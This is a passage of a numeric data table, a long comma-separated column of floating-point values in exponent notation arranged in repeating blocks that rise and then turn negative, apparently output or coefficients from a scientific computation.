0.27123058e-01,
0.25902657e-01,
0.24672238e-01,
0.23434937e-01,
0.22190256e-01,
0.20934626e-01,
0.19663457e-01,
0.18373784e-01,
0.17065847e-01,
0.15741942e-01,
0.14402619e-01,
0.13038933e-01,
0.11620902e-01,
0.10082259e-01,
0.83062556e-02,
0.61375611e-02,
0.34738728e-02,
0.47380762e-03,
-0.23008718e-02,
-0.42078327e-02,
-0.52424278e-02,
-0.60545313e-02,
-0.70956550e-02,
-0.83303098e-02,
-0.96523445e-02,
-0.11092181e-01,
-0.12791218e-01,
-0.15045415e-01,
-0.17619489e-01,
-0.17940814e-01,
0.18581720e-01,
0.20915883e-01,
0.23829265e-01,
0.26822245e-01,
0.29536562e-01,
0.31751547e-01,
0.33401374e-01,
0.34548633e-01,
0.35312355e-01,
0.35800364e-01,
0.36083620e-01,
0.36202855e-01,
0.36181841e-01,
0.36035892e-01,
0.35775941e-01,
0.35410490e-01,
0.34946699e-01,
0.34391019e-01,
0.33749603e-01,
0.33028524e-01,
0.32233991e-01,
0.31372394e-01,
0.30450473e-01,
0.29475490e-01,
0.28455326e-01,
0.27398327e-01,
0.26312927e-01,
0.25206672e-01,
0.24085123e-01,
0.22950860e-01,
0.21803081e-01,
0.20638589e-01,
0.19453924e-01,
0.18248010e-01,
0.17023819e-01,
0.15788162e-01,
0.14549590e-01,
0.13314429e-01,
0.12082065e-01,
0.10838719e-01,
0.95478874e-02,
0.81366943e-02,
0.64820210e-02,
0.44224774e-02,
0.18523625e-02,
-0.10648414e-02,
-0.37534775e-02,
-0.55650654e-02,
-0.65100682e-02,
-0.72507914e-02,
-0.82312562e-02,
-0.94086677e-02,
-0.10678349e-01,
-0.12073795e-01,
-0.13739666e-01,
-0.15975196e-01,
-0.18515551e-01,
-0.18804787e-01,
0.17168749e-01,
0.19327780e-01,
0.22023177e-01,
0.24793051e-01,
0.27306184e-01,
0.29358532e-01,
0.30889180e-01,
0.31955894e-01,
0.32668613e-01,
0.33126883e-01,
0.33396173e-01,
0.33513986e-01,
0.33502162e-01,
0.33374704e-01,
0.33141572e-01,
0.32810479e-01,
0.32387879e-01,
0.31879608e-01,
0.31291280e-01,
0.30628527e-01,
0.29897207e-01,
0.29103544e-01,
0.28254325e-01,
0.27356898e-01,
0.26419124e-01,
0.25448931e-01,
0.24453351e-01,
0.23437385e-01,
0.22403084e-01,
0.21349376e-01,
0.20273272e-01,
0.19171963e-01,
0.18045446e-01,
0.16897894e-01,
0.15737535e-01,
0.14574960e-01,
0.13420397e-01,
0.12280968e-01,
0.11158198e-01,
0.10045296e-01,
0.89227157e-02,
0.77492185e-02,
0.64479085e-02,
0.48916428e-02,
0.29151232e-02,
0.41272587e-03,
-0.24413855e-02,
-0.50533284e-02,
-0.67725605e-02,
-0.76342914e-02,
-0.83150435e-02,
-0.92462925e-02,
-0.10376302e-01,
-0.11603034e-01,
-0.12963645e-01,
-0.14606736e-01,
-0.16835131e-01,
-0.19348454e-01,
-0.19612487e-01,
0.15865134e-01,
0.17862506e-01,
0.20356622e-01,
0.22920400e-01,
0.25247563e-01,
0.27149413e-01,
0.28569562e-01,
0.29561354e-01,
0.30226331e-01,
0.30656436e-01,
0.30912070e-01,
0.31027781e-01,
0.31023609e-01,
0.30912362e-01,
0.30703111e-01,
0.30402854e-01,
0.30017478e-01,
0.29552329e-01,
0.29012615e-01,
0.28403712e-01,
0.27731372e-01,
0.27001891e-01,
0.26222091e-01,
0.25399221e-01,
0.24540421e-01,
0.23651907e-01,
0.22738006e-01,
0.21800319e-01,
0.20837659e-01,
0.19847298e-01,
0.18827075e-01,
0.17777784e-01,
0.16704248e-01,
0.15615269e-01,
0.14521973e-01,
0.13435473e-01,
0.12364727e-01,
0.11315233e-01,
0.10288181e-01,
0.92796814e-02,
0.82787825e-02,
0.72630350e-02,
0.61889994e-02,
0.49772034e-02,
0.34969368e-02,
0.15794969e-02,
-0.87806711e-03,
-0.36851568e-02,
-0.62257764e-02,
-0.78527220e-02,
-0.86356523e-02,
-0.92662042e-02,
-0.10158284e-01,
-0.11249557e-01,
-0.12441714e-01,
-0.13776368e-01,
-0.15406553e-01,
-0.17638773e-01,
-0.20130811e-01,
-0.20375945e-01,
0.14662431e-01,
0.16510550e-01,
0.18818781e-01,
0.21192145e-01,
0.23347380e-01,
0.25109937e-01,
0.26427617e-01,
0.27349673e-01,
0.27969934e-01,
0.28373329e-01,
0.28615609e-01,
0.28728599e-01,
0.28730700e-01,
0.28633634e-01,
0.28445678e-01,
0.28173234e-01,
0.27821736e-01,
0.27396221e-01,
0.26901733e-01,
0.26343603e-01,
0.25727598e-01,
0.25059966e-01,
0.24347208e-01,
0.23595579e-01,
0.22810331e-01,
0.21994932e-01,
0.21150416e-01,
0.20275565e-01,
0.19368108e-01,
0.18426621e-01,
0.17452605e-01,
0.16451407e-01,
0.15432071e-01,
0.14405738e-01,
0.13383573e-01,
0.12374919e-01,
0.11386278e-01,
0.10420920e-01,
0.94791828e-02,
0.85583618e-02,
0.76520443e-02,
0.67478423e-02,
0.58222217e-02,
0.48302943e-02,
0.36898023e-02,
0.22657616e-02,
0.38620809e-03,
-0.20464570e-02,
-0.48193890e-02,
-0.72907535e-02,
-0.88232690e-02,
-0.95311515e-02,
-0.10120570e-01,
-0.10982438e-01,
-0.12042844e-01,
-0.13208187e-01,
-0.14525170e-01,
-0.16151898e-01,
-0.18398402e-01,
-0.20873869e-01,
-0.21105917e-01,
0.13552637e-01,
0.15262923e-01,
0.17399436e-01,
0.19596824e-01,
0.21593064e-01,
0.23226669e-01,
0.24449309e-01,
0.25306473e-01,
0.25884863e-01,
0.26262935e-01,
0.26492154e-01,
0.26601870e-01,
0.26609030e-01,
0.26524415e-01,
0.26355645e-01,
0.26108669e-01,
0.25788641e-01,
0.25400463e-01,
0.24949163e-01,
0.24440058e-01,
0.23878768e-01,
0.23270955e-01,
0.22621866e-01,
0.21935685e-01,
0.21214921e-01,
0.20460036e-01,
0.19669790e-01,
0.18842377e-01,
0.17977156e-01,
0.17076379e-01,
0.16145866e-01,
0.15194753e-01,
0.14234038e-01,
0.13274660e-01,
0.12325864e-01,
0.11394359e-01,
0.10484057e-01,
0.95965564e-02,
0.87314118e-02,
0.78865895e-02,
0.70581776e-02,
0.62391688e-02,
0.54168063e-02,
0.45667454e-02,
0.36422682e-02,
0.25576062e-02,
0.11724485e-02,
-0.68855018e-03,
-0.31142109e-02,
-0.58629848e-02,
-0.82644373e-02,
-0.96990969e-02,
-0.10335494e-01,
-0.10892544e-01,
-0.11732457e-01,
-0.12769138e-01,
-0.13914877e-01,
-0.15221934e-01,
-0.16854212e-01,
-0.19125070e-01,
-0.21587910e-01,
-0.21812512e-01,
0.12528375e-01,
0.14111324e-01,
0.16089143e-01,
0.18123835e-01,
0.19972973e-01,
0.21487134e-01,
0.22621555e-01,
0.23418266e-01,
0.23957409e-01,
0.24311502e-01,
0.24528088e-01,
0.24634261e-01,
0.24645658e-01,
0.24572272e-01,
0.24421265e-01,
0.24198342e-01,
0.23908518e-01,
0.23556618e-01,
0.23147549e-01,
0.22686291e-01,
0.22177676e-01,
0.21625938e-01,
0.21034168e-01,
0.20403879e-01,
0.19734910e-01,
0.19025959e-01,
0.18275727e-01,
0.17484382e-01,
0.16654858e-01,
0.15793348e-01,
0.14909030e-01,
0.14012692e-01,
0.13114928e-01,
0.12224767e-01,
0.11348879e-01,
0.10491370e-01,
0.96542966e-02,
0.88380333e-02,
0.80419006e-02,
0.72643128e-02,
0.65027624e-02,
0.57532680e-02,
0.50087180e-02,
0.42559886e-02,
0.34697335e-02,
0.26006724e-02,
0.15582409e-02,
0.19586713e-03,
-0.16648462e-02,
-0.41000666e-02,
-0.68322704e-02,
-0.91604441e-02,
-0.10493010e-01,
-0.11061922e-01,
-0.11595163e-01,
-0.12420692e-01,
-0.13440105e-01,
-0.14572812e-01,
-0.15877264e-01,
-0.17524028e-01,
-0.19829245e-01,
-0.22282675e-01,
-0.22505168e-01,
0.11582712e-01,
0.13047962e-01,
0.14879054e-01,
0.16763248e-01,
0.18476224e-01,
0.19879704e-01,
0.20932244e-01,
0.21672688e-01,
0.22175148e-01,
0.22506684e-01,
0.22711273e-01,
0.22814000e-01,
0.22829419e-01,
0.22766909e-01,
0.22633271e-01,
0.22434004e-01,
0.22174012e-01,
0.21857906e-01,
0.21490037e-01,
0.21074377e-01,
0.20614149e-01,
0.20111440e-01,
0.19566908e-01,
0.18979838e-01,
0.18348834e-01,
0.17672971e-01,
0.16953107e-01,
0.16192837e-01,
0.15398719e-01,
0.14579884e-01,
0.13746735e-01,
0.12909485e-01,
0.12076905e-01,
0.11255554e-01,
0.10449625e-01,
0.96614184e-02,
0.88916803e-02,
0.81402799e-02,
0.74064764e-02,
0.66891308e-02,
0.59866421e-02,
0.52965824e-02,
0.46150312e-02,
0.39348379e-02,
0.32422331e-02,
0.25101355e-02,
0.16859862e-02,
0.67323016e-03,
-0.68223715e-03,
-0.25608686e-02,
-0.50209761e-02,
-0.77415816e-02,
-0.99905552e-02,
-0.11216282e-01,
-0.11722405e-01,
-0.12240239e-01,
-0.13058126e-01,
-0.14066087e-01,
-0.15192053e-01,
-0.16501144e-01,
-0.18171404e-01,
-0.20520791e-01,
-0.22966992e-01,
-0.23192288e-01,
0.10709423e-01,
0.12065823e-01,
0.13761187e-01,
0.15506121e-01,
0.17093049e-01,
0.18394005e-01,
0.19370625e-01,
0.20058842e-01,
0.20527244e-01,
0.20837912e-01,
0.21031609e-01,
0.21131653e-01,
0.21151649e-01,
0.21100447e-01,
0.20984545e-01,
0.20809161e-01,
0.20578744e-01,
0.20297162e-01,
0.19967660e-01,
0.19592566e-01,
0.19173032e-01,
0.18708948e-01,
0.18199200e-01,
0.17642427e-01,
0.17038029e-01,
0.16387362e-01,
0.15694451e-01,
0.14966104e-01,
0.14211375e-01,
0.13440318e-01,
0.12662663e-01,
0.11886760e-01,
0.11119010e-01,
0.10363686e-01,
0.96232807e-02,
0.88988189e-02,
0.81905108e-02,
0.74980101e-02,
0.68207132e-02,
0.61578541e-02,
0.55083996e-02,
0.48709009e-02,
0.42431629e-02,
0.36212225e-02,
0.29974312e-02,
0.23571376e-02,
0.16709621e-02,
0.88186091e-03,
-0.11385441e-03,
-0.14786492e-02,
-0.33936626e-02,
-0.58928211e-02,
-0.86036716e-02,
-0.10764806e-01,
-0.11878857e-01,
-0.12327690e-01,
-0.12838322e-01,
-0.13654754e-01,
-0.14656777e-01,
-0.15782116e-01,
-0.17102929e-01,
-0.18805560e-01,
-0.21208614e-01,
-0.23648826e-01,
-0.23881109e-01,
0.99031366e-02,
0.11158862e-01,
0.12728675e-01,
0.14344782e-01,
0.15815102e-01,
0.17021233e-01,
0.17927697e-01,
0.18567791e-01,
0.19005040e-01,
0.19296985e-01,
0.19481450e-01,
0.19580156e-01,
0.19605840e-01,
0.19566806e-01,
0.19469030e-01,
0.19317091e-01,
0.19114554e-01,
0.18864036e-01,
0.18567108e-01,
0.18224217e-01,
0.17834747e-01,
0.17397350e-01,
0.16910696e-01,
0.16374495e-01,
0.15790507e-01,
0.15163027e-01,
0.14498919e-01,
0.13806998e-01,
0.13096904e-01,
0.12377877e-01,
0.11657882e-01,
0.10943062e-01,
0.10237600e-01,
0.95441425e-02,
0.88640014e-02,
0.81976959e-02,
0.75451867e-02,
0.69061988e-02,
0.62803319e-02,
0.56670737e-02,
0.50658169e-02,
0.44758078e-02,
0.38957228e-02,
0.33232321e-02,
0.27542519e-02,
0.21804536e-02,
0.15856215e-02,
0.93752530e-03,
0.17370789e-03,
-0.81816822e-03,
-0.22095586e-02,
-0.41797617e-02,
-0.67304755e-02,
-0.94296988e-02,
-0.11491459e-01,
-0.12489353e-01,
-0.12887697e-01,
-0.13399359e-01,
-0.14220017e-01,
-0.15221213e-01,
-0.16351623e-01,
-0.17690992e-01,
-0.19434931e-01,
-0.21900531e-01,
-0.24334403e-01,
-0.24576908e-01,
0.91596041e-02,
0.10322293e-01,
0.11776099e-01,
0.13273214e-01,
0.14635916e-01,
0.15754675e-01,
0.16596718e-01,
0.17192930e-01,
0.17602194e-01,
0.17877869e-01,
0.18055072e-01,
0.18153975e-01,
0.18186348e-01,
0.18159697e-01,
0.18079169e-01,
0.17948311e-01,
0.17769367e-01,
0.17543392e-01,
0.17270328e-01,
0.16949220e-01,
0.16578663e-01,
0.16157566e-01,
0.15685990e-01,
0.15165905e-01,
0.14601668e-01,
0.14000042e-01,
0.13369541e-01,
0.12719298e-01,
0.12057992e-01,
0.11393145e-01,
0.10730589e-01,
0.10074451e-01,
0.94274255e-02,
0.87909503e-02,
0.81658233e-02,
0.75523388e-02,
0.69505223e-02,
0.63602584e-02,
0.57813367e-02,
0.52134916e-02,
0.46564899e-02,
0.41098930e-02,
0.35728957e-02,
0.30442516e-02,
0.25214758e-02,
0.19998695e-02,
0.14702382e-02,
0.91451913e-03,
0.29673893e-03,
-0.45211281e-03,
-0.14543475e-02,
-0.28908835e-02,
-0.49353936e-02,
-0.75476863e-02,
-0.10228912e-01,
-0.12177330e-01,
-0.13055839e-01,
-0.13411977e-01,
-0.13932705e-01,
-0.14762470e-01,
-0.15767431e-01,
-0.16908331e-01,
-0.18272618e-01,
-0.20066334e-01,
-0.22602497e-01,
-0.25027955e-01,
-0.25282444e-01,
0.84757134e-02,
0.95526502e-02,
0.10899562e-01,
0.12287115e-01,
0.13550865e-01,
0.14589507e-01,
0.15372781e-01,
0.15929360e-01,
0.16313823e-01,
0.16575595e-01,
0.16747160e-01,
0.16847055e-01,
0.16885890e-01,
0.16870106e-01,
0.16803687e-01,
0.16688865e-01,
0.16526472e-01,
0.16316228e-01,
0.16057082e-01,
0.15747746e-01,
0.15387391e-01,
0.14976392e-01,
0.14516956e-01,
0.14013476e-01,
0.13472388e-01,
0.12901680e-01,
0.12309901e-01,
0.11705250e-01,
0.11094769e-01,
0.10483908e-01,
0.98766321e-02,
0.92755975e-02,
0.86824028e-02,
0.80980305e-02,
0.75229523e-02,
0.69574793e-02,
0.64018168e-02,
0.58560292e-02,
0.53201127e-02,
0.47941157e-02,
0.42779413e-02,
0.37713288e-02,
0.32739611e-02,
0.27850254e-02,
0.23029358e-02,
0.18249402e-02,
0.13457378e-02,
0.85484359e-03,
0.33187922e-03,
-0.26360160e-03,
-0.10086164e-02,
-0.20368681e-02,
-0.35384803e-02,
-0.56763412e-02,
-0.83571654e-02,
-0.11009140e-01,
-0.12828228e-01,
-0.13585953e-01,
-0.13909469e-01,
-0.14446771e-01,
-0.15289789e-01,
-0.16302353e-01,
-0.17458308e-01,
-0.18853234e-01,
-0.20704713e-01,
-0.23318050e-01,
-0.25730822e-01,
-0.25997423e-01,
0.78488868e-02,
0.88471249e-02,
0.10095963e-01,
0.11383073e-01,
0.12556248e-01,
0.13521745e-01,
0.14251599e-01,
0.14772387e-01,
0.15134628e-01,
0.15383984e-01,
0.15550311e-01,
0.15650392e-01,
0.15693463e-01,
0.15684696e-01,
0.15626790e-01,
0.15520756e-01,
0.15366406e-01,
0.15162837e-01,
0.14909022e-01,
0.14604477e-01,
0.14249890e-01,
0.13847613e-01,
0.13401926e-01,
0.12918934e-01,
0.12406076e-01,
0.11871213e-01,
0.11321891e-01,
0.10764673e-01,
0.10204747e-01,
0.96458644e-02,
0.90905391e-02,
0.85403854e-02,
0.79964781e-02,
0.74595166e-02,
0.69300104e-02,
0.64083328e-02,
0.58948221e-02,
0.53897803e-02,
0.48935004e-02,
0.44061504e-02,
0.39277528e-02,
0.34583132e-02,
0.29976317e-02,
0.25451381e-02,
0.20998786e-02,
0.16600611e-02,
0.12224072e-02,
0.78081363e-03,
0.32335857e-03,
-0.17330737e-03,
-0.75507897e-03,
-0.15084407e-02,
-0.25801368e-02,
-0.41686138e-02,
-0.64185774e-02,
-0.91707250e-02,
-0.11776590e-01,
-0.13448806e-01,
-0.14086716e-01,
-0.14388485e-01,
-0.14948927e-01,
-0.15807996e-01,
-0.16831016e-01,
-0.18005654e-01,
-0.19435892e-01,
-0.21352261e-01,
-0.24047775e-01,
-0.26441328e-01,
-0.26718097e-01,
0.72761136e-02,
0.82024941e-02,
0.93617616e-02,
0.10557142e-01,
0.11647610e-01,
0.12546310e-01,
0.13227314e-01,
0.13715181e-01,
0.14056569e-01,
0.14293512e-01,
0.14453239e-01,
0.14550695e-01,
0.14593684e-01,
0.14586142e-01,
0.14529741e-01,
0.14424738e-01,
0.14270628e-01,
0.14066807e-01,
0.13813181e-01,
0.13510717e-01,
0.13161879e-01,
0.12770806e-01,
0.12343196e-01,
0.11885820e-01,
0.11405828e-01,
0.10910179e-01,
0.10404940e-01,
0.98949000e-02,
0.93836067e-02,
0.88735307e-02,
0.83662188e-02,
0.78627151e-02,
0.73637851e-02,
0.68700551e-02,
0.63821264e-02,
0.59005306e-02,
0.54257177e-02,
0.49582440e-02,
0.44985944e-02,
0.40470236e-02,
0.36037776e-02,
0.31689804e-02,
0.27423929e-02,
0.23237155e-02,
0.19122795e-02,
0.15068311e-02,
0.11052121e-02,
0.70368673e-03,
0.29509133e-03,
-0.13425731e-03,
-0.61128259e-03,
-0.11886779e-02,
-0.19643204e-02,
-0.30994283e-02,
-0.47985963e-02,
-0.71782242e-02,
-0.99987285e-02,
-0.12535306e-01,
-0.14042607e-01,
-0.14564627e-01,
-0.14856030e-01,
-0.15444703e-01,
-0.16321121e-01,
-0.17356047e-01,
-0.18551625e-01,
-0.20020738e-01,
-0.22008330e-01,
-0.24788912e-01,
-0.27153788e-01,
-0.27435988e-01,
0.67528659e-02,
0.76138428e-02,
0.86914934e-02,
0.98031582e-02,
0.10817948e-01,
0.11655207e-01,
0.12290766e-01,
0.12747228e-01,
0.13067597e-01,
0.13290452e-01,
0.13440499e-01,
0.13530949e-01,
0.13568352e-01,
0.13555742e-01,
0.13494246e-01,
0.13384038e-01,
0.13225075e-01,
0.13017694e-01,
0.12763139e-01,
0.12463950e-01,
0.12124085e-01,
0.11748808e-01,
0.11344243e-01,
0.10916842e-01,
0.10472860e-01,
0.10017826e-01,
0.95562525e-02,
0.90915291e-02,
0.86259460e-02,
0.81609664e-02,
0.76976661e-02,
0.72367843e-02,
0.67789229e-02,
0.63247578e-02,
0.58749435e-02,
0.54301512e-02,
0.49911011e-02,
0.45584417e-02,
0.41327197e-02,
0.37144551e-02,
0.33040245e-02,
0.29014633e-02,
0.25067537e-02,
0.21196145e-02,
0.17395143e-02,
0.13655368e-02,
0.99622435e-03,
0.62900473e-03,
0.25951708e-03,
-0.12054403e-03,
-0.52714220e-03,
-0.99177333e-03,
-0.15755766e-02,
-0.23898906e-02,
-0.36114564e-02,
-0.54468848e-02,
-0.79709487e-02,
-0.10849346e-01,
-0.13287026e-01,
-0.14611776e-01,
-0.15024997e-01,
-0.15317407e-01,
-0.15937271e-01,
-0.16830366e-01,
-0.17877102e-01,
-0.19094490e-01,
-0.20604689e-01,
-0.22668475e-01,
-0.25534086e-01,
-0.27857255e-01,
-0.28136132e-01,
0.62725060e-02,
0.70738452e-02,
0.80769034e-02,
0.91117928e-02,
0.10056756e-01,
0.10836687e-01,
0.11428916e-01,
0.11854174e-01,
0.12152059e-01,
0.12357980e-01,
0.12494393e-01,
0.12573079e-01,
0.12599719e-01,
0.12576928e-01,
0.12505878e-01,
0.12387235e-01,
0.12221836e-01,
0.12011216e-01,
0.11757963e-01,
0.11465836e-01,
0.11139663e-01,
0.10784952e-01,
0.10407481e-01,
0.10012860e-01,
0.96060764e-02,
0.91912504e-02,
0.87715685e-02,
0.83493032e-02,
0.79259127e-02,
0.75023416e-02,
0.70792502e-02,
0.66572730e-02,
0.62370505e-02,
0.58192150e-02,
0.54045119e-02,
0.49937805e-02,
0.45878929e-02,
0.41875835e-02,
0.37935111e-02,
0.34063701e-02,
0.30265125e-02,
0.26541308e-02,
0.22892184e-02,
0.19315761e-02,
0.15806772e-02,
0.12358783e-02,
0.89602108e-03,
0.55933301e-03,
0.22290465e-03,
-0.11837736e-03,
-0.47439354e-03,
-0.86409569e-03,
-0.13247277e-02,
-0.19277434e-02,
-0.28001412e-02,
-0.41344408e-02,
-0.61328700e-02,
-0.88115418e-02,
-0.11727598e-01,
-0.14030309e-01,
-0.15156906e-01,
-0.15471662e-01,
-0.15775396e-01,
-0.16426805e-01,
-0.17333917e-01,
-0.18390546e-01,
-0.19628605e-01,
-0.21180209e-01,
-0.23323257e-01,
-0.26269557e-01,
-0.28532716e-01,
-0.28793098e-01,
0.58267605e-02,
0.65732352e-02,
0.75074541e-02,
0.84711155e-02,
0.93507199e-02,
0.10076155e-01,
0.10626074e-01,
0.11019482e-01,
0.11292907e-01,
0.11478950e-01,
0.11598186e-01,
0.11661368e-01,
0.11673780e-01,
0.11638117e-01,
0.11556003e-01,
0.11428879e-01,
0.11258594e-01,
0.11047787e-01,
0.10800015e-01,
0.10519676e-01,
0.10211711e-01,
0.98812887e-02,
0.95334202e-02,
0.91725811e-02,
0.88025127e-02,
0.84261857e-02,
0.80457665e-02,
0.76626753e-02,
0.72779190e-02,
0.68921465e-02,
0.65058237e-02,
0.61194906e-02,
0.57338160e-02,
0.53495029e-02,
0.49673491e-02,
0.45883162e-02,
0.42133094e-02,
0.38431743e-02,
0.34787988e-02,
0.31207474e-02,
0.27695056e-02,
0.24253791e-02,
0.20884008e-02,
0.17583206e-02,
0.14347950e-02,
0.11171702e-02,
0.80453861e-03,
0.49563375e-03,
0.18838409e-03,
-0.12067244e-03,
-0.43773217e-03,
-0.77462569e-03,
-0.11541138e-02,
-0.16205981e-02,
-0.22580458e-02,
-0.32116263e-02,
-0.46886820e-02,
-0.68765748e-02,
-0.97123422e-02,
-0.12634131e-01,
-0.14760367e-01,
-0.15676778e-01,
-0.15906356e-01,
-0.16229935e-01,
-0.16910229e-01,
-0.17826060e-01,
-0.18888203e-01,
-0.20143216e-01,
-0.21733690e-01,
-0.23955522e-01,
-0.26971251e-01,
-0.29147699e-01,
-0.29363733e-01,
0.54070717e-02,
0.61022816e-02,
0.69719772e-02,
0.78685069e-02,
0.86859381e-02,
0.93587395e-02,
0.98667927e-02,
0.10227575e-01,
0.10474904e-01,
0.10638993e-01,
0.10738960e-01,
0.10784928e-01,
0.10782113e-01,
0.10733562e-01,
0.10641565e-01,
0.10508422e-01,
0.10336863e-01,
0.10130250e-01,
0.98925652e-02,
0.96282410e-02,
0.93418919e-02,
0.90379883e-02,
0.87205544e-02,
0.83929868e-02,
0.80580246e-02,
0.77177160e-02,
0.73734652e-02,
0.70262798e-02,
0.66767824e-02,
0.63254600e-02,
0.59727905e-02,
0.56192488e-02,
0.52654315e-02,
0.49121627e-02,
0.45603677e-02,
0.42109452e-02,
0.38648082e-02,
0.35230482e-02,
0.31864857e-02,
0.28557458e-02,
0.25313764e-02,
0.22137545e-02,
0.19029069e-02,
0.15987142e-02,
0.13008172e-02,
0.10086106e-02,
0.72139426e-03,
0.43811998e-03,
0.15723592e-03,
-0.12376621e-03,
-0.40906059e-03,
-0.70619176e-03,
-0.10294477e-02,
-0.14063339e-02,
-0.18904223e-02,
-0.25809507e-02,
-0.36431164e-02,
-0.52961027e-02,
-0.76976335e-02,
-0.10682030e-01,
-0.13564016e-01,
-0.15468677e-01,
-0.16168477e-01,
-0.16328586e-01,
-0.16677296e-01,
-0.17379910e-01,
-0.18295975e-01,
-0.19355783e-01,
-0.20619802e-01,
-0.22241637e-01,
-0.24535159e-01,
-0.27597541e-01,
-0.29646901e-01,
-0.29775085e-01,
0.50061666e-02,
0.56525916e-02,
0.64607500e-02,
0.72929878e-02,
0.80504669e-02,
0.86719748e-02,
0.91386139e-02,
0.94665419e-02,
0.96872011e-02,
0.98287789e-02,
0.99092564e-02,
0.99384002e-02,
0.99215917e-02,
0.98623503e-02,
0.97636050e-02,
0.96283276e-02,
0.94598122e-02,
0.92617264e-02,
0.90380237e-02,
0.87927980e-02,
0.85300365e-02,
0.82533574e-02,
0.79658525e-02,
0.76700603e-02,
0.73679010e-02,
0.70607387e-02,
0.67495992e-02,
0.64351326e-02,
0.61177979e-02,
0.57979897e-02,
0.54761712e-02,
0.51528304e-02,
0.48285746e-02,
0.45042443e-02,
0.41807955e-02,
0.38590934e-02,
0.35402139e-02,
0.32251289e-02,
0.29146906e-02,
0.26096692e-02,
0.23106080e-02,
0.20178384e-02,
0.17315357e-02,
0.14516271e-02,
0.11777402e-02,
0.90943626e-03,
0.64600032e-03,
0.38659063e-03,
0.12990853e-03,
-0.12597593e-03,
-0.38408191e-03,
-0.64947037e-03,
-0.93128323e-03,
-0.12469848e-02,
-0.16304143e-02,
-0.21464191e-02,
-0.29125693e-02,
-0.41156993e-02,
-0.59804209e-02,
-0.86140092e-02,
-0.11723425e-01,
-0.14505944e-01,
-0.16143575e-01,
-0.16627248e-01,
-0.16734317e-01,
-0.17108738e-01,
-0.17822174e-01,
-0.18725207e-01,
-0.19769130e-01,
-0.21026963e-01,
-0.22663718e-01,
-0.25009871e-01,
-0.28077208e-01,
-0.29936161e-01,
-0.29903086e-01,
0.46191481e-02,
0.52183974e-02,
0.59670168e-02,
0.67369491e-02,
0.74361749e-02,
0.80076661e-02,
0.84337806e-02,
0.87295286e-02,
0.89242216e-02,
0.90442616e-02,
0.91067078e-02,
0.91211265e-02,
0.90931328e-02,
0.90266792e-02,
0.89251632e-02,
0.87919217e-02,
0.86304275e-02,
0.84443204e-02,
0.82372911e-02,
0.80128787e-02,
0.77742967e-02,
0.75243628e-02,
0.72654327e-02,
0.69993068e-02,
0.67273136e-02,
0.64504785e-02,
0.61694812e-02,
0.58848094e-02,
0.55968449e-02,
0.53059584e-02,
0.50125136e-02,
0.47170832e-02,
0.44203578e-02,
0.41231164e-02,
0.38261772e-02,
0.35306206e-02,
0.32374398e-02,
0.29475170e-02,
0.26617502e-02,
0.23809616e-02,
0.21057320e-02,
0.18363672e-02,
0.15731406e-02,
0.13160043e-02,
0.10647054e-02,
0.81881043e-03,
0.57776505e-03,
0.34065990e-03,
0.10639309e-03,
-0.12660332e-03,
-0.36068761e-03,
-0.59937662e-03,
-0.84880623e-03,
-0.11204274e-02,
-0.14357190e-02,
-0.18365043e-02,
-0.24020236e-02,
-0.32714859e-02,
-0.46532732e-02,
-0.67663151e-02,
-0.96402615e-02,
-0.12831893e-01,
-0.15441692e-01,
-0.16770078e-01,
-0.17045652e-01,
-0.17114457e-01,
-0.17508077e-01,
-0.18213695e-01,
-0.19082699e-01,
-0.20087397e-01,
-0.21311399e-01,
-0.22931056e-01,
-0.25289452e-01,
-0.28288210e-01,
-0.29855460e-01,
-0.29540431e-01,
0.42438372e-02,
0.47970237e-02,
0.54875640e-02,
0.61967750e-02,
0.68393080e-02,
0.73622656e-02,
0.77493028e-02,
0.80144051e-02,
0.81849089e-02,
0.82855793e-02,
0.83326427e-02,
0.83354777e-02,
0.82998471e-02,
0.82299737e-02,
0.81294924e-02,
0.80018509e-02,
0.78504579e-02,
0.76786745e-02,
0.74897227e-02,
0.72865360e-02,
0.70716739e-02,
0.68472759e-02,
0.66150147e-02,
0.63761803e-02,
0.61317808e-02,
0.58825328e-02,
0.56289569e-02,
0.53714588e-02,
0.51103933e-02,
0.48460537e-02,
0.45788516e-02,
0.43093446e-02,
0.40383078e-02,
0.37663926e-02,
0.34944667e-02,
0.32235801e-02,
0.29546390e-02,
0.26885115e-02,
0.24261076e-02,
0.21682207e-02,
0.19154118e-02,
0.16681626e-02,
0.14266440e-02,
0.11909056e-02,
0.96084451e-03,
0.73608221e-03,
0.51601185e-03,
0.29983022e-03,
0.86455977e-04,
-0.12548176e-03,
-0.33780126e-03,
-0.55322744e-03,
-0.77611348e-03,
-0.10140111e-02,
-0.12810014e-02,
-0.16041107e-02,
-0.20356334e-02,
-0.26726879e-02,
-0.36793316e-02,
-0.52829208e-02,
-0.76788506e-02,
-0.10785309e-01,
-0.13992673e-01,
-0.16345447e-01,
-0.17329855e-01,
-0.17411666e-01,
-0.17451219e-01,
-0.17846853e-01,
-0.18514944e-01,
-0.19316018e-01,
-0.20241588e-01,
-0.21382602e-01,
-0.22925586e-01,
-0.25219092e-01,
-0.28025590e-01,
-0.29143283e-01,
-0.28364539e-01,
0.38802244e-02,
0.43883347e-02,
0.50221425e-02,
0.56721950e-02,
0.62597329e-02,
0.67359642e-02,
0.70858784e-02,
0.73225168e-02,
0.74713244e-02,
0.75554666e-02,
0.75903148e-02,
0.75849718e-02,
0.75452076e-02,
0.74753161e-02,
0.73789642e-02,
0.72595305e-02,
0.71201995e-02,
0.69639226e-02,
0.67933705e-02,
0.66109342e-02,
0.64186375e-02,
0.62180408e-02,
0.60103335e-02,
0.57964721e-02,
0.55771875e-02,
0.53530186e-02,
0.51244237e-02,
0.48917811e-02,
0.46553644e-02,
0.44155009e-02,
0.41726306e-02,
0.39273482e-02,
0.36802413e-02,
0.34321158e-02,
0.31838417e-02,
0.29362249e-02,
0.26901832e-02,
0.24466240e-02,
0.22063667e-02,
0.19700988e-02,
0.17385191e-02,
0.15121014e-02,
0.12910479e-02,
0.10755060e-02,
0.86542196e-03,
0.66050846e-03,
0.46016547e-03,
0.26359106e-03,
0.69742789e-04,
-0.12264148e-03,
-0.31505234e-03,
-0.50968054e-03,
-0.70983008e-03,
-0.92059938e-03,
-0.11514680e-02,
-0.14202188e-02,
-0.17611791e-02,
-0.22402222e-02,
-0.29767312e-02,
-0.41622054e-02,
-0.60354555e-02,
-0.87412195e-02,
-0.12048509e-01,
-0.15178418e-01,
-0.17183300e-01,
-0.17799482e-01,
-0.17704254e-01,
-0.17711623e-01,
-0.18075820e-01,
-0.18659104e-01,
-0.19336520e-01,
-0.20114373e-01,
-0.21086661e-01,
-0.22448380e-01,
-0.24543686e-01,
-0.26968870e-01,
-0.27425798e-01,
